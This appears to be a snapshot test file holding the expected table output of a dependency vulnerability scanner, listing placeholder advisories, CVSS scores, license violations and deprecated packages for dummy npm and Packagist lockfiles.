╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ 9 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ 8.3 │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭──────────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├──────────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/GHSA-123 │ │ │ │ │ │ │ ╰──────────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────┬───────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼───────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-2 │ │ npm │ mine3 │ 0.10.2-rc │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴───────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. ╭───────────────────────┬──────┬───────────┬─────────┬─────────┬───────────────┬───────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────┼─────────┼───────────────┼───────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────┴─────────┴───────────────┴───────────────────────────╯ --- [TestPrintTableResults_LongTerminalWidth_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
╭───────────────────────┬──────┬───────────┬─────────────┬─────────┬───────────────┬────────────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ FIXED VERSION │ SOURCE │ ├───────────────────────┼──────┼───────────┼─────────────┼─────────┼───────────────┼────────────────────────────┤ │ https://osv.dev/OSV-1 │ │ npm │ mine1 │ 1.2.3 │ -- │ path/to/my/first/lockfile │ │ https://osv.dev/OSV-1 │ │ npm │ mine1 (dev) │ 1.2.3 │ -- │ path/to/my/second/lockfile │ ╰───────────────────────┴──────┴───────────┴─────────────┴─────────┴───────────────┴────────────────────────────╯ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. +-------------------+-----------+---------------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------------+---------+----------------------------+ | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
--- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT, Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | 7.8 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +--------------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | +-----------------------+------+-----------+---------+---------+---------------+----------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. +---------------------------------------------------------+ | Deprecated packages | +-----------+----------------+---------+------------------+ | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-----------+----------------+---------+------------------+ | npm | deprecated-pkg | 1.0.0 | path/to/lockfile | +-----------+----------------+---------+------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | Uncalled vulnerabilities | | | | | | | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +--------------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+---------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+---------------------------+ | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | +-------------------+-----------+---------+---------+---------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | +-----------------------+------+-----------+---------+---------+---------------+---------------------------+ +-------------------+-----------+---------+---------+----------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+---------+---------+----------------------------+ | MIT | npm | mine2 | 5.9.0 | path/to/my/second/lockfile | +-------------------+-----------+---------+---------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 (dev) | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | +-----------------------+------+-----------+-------------+---------+---------------+----------------------------+ --- [TestPrintTableResults_NoTerminalWidth_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
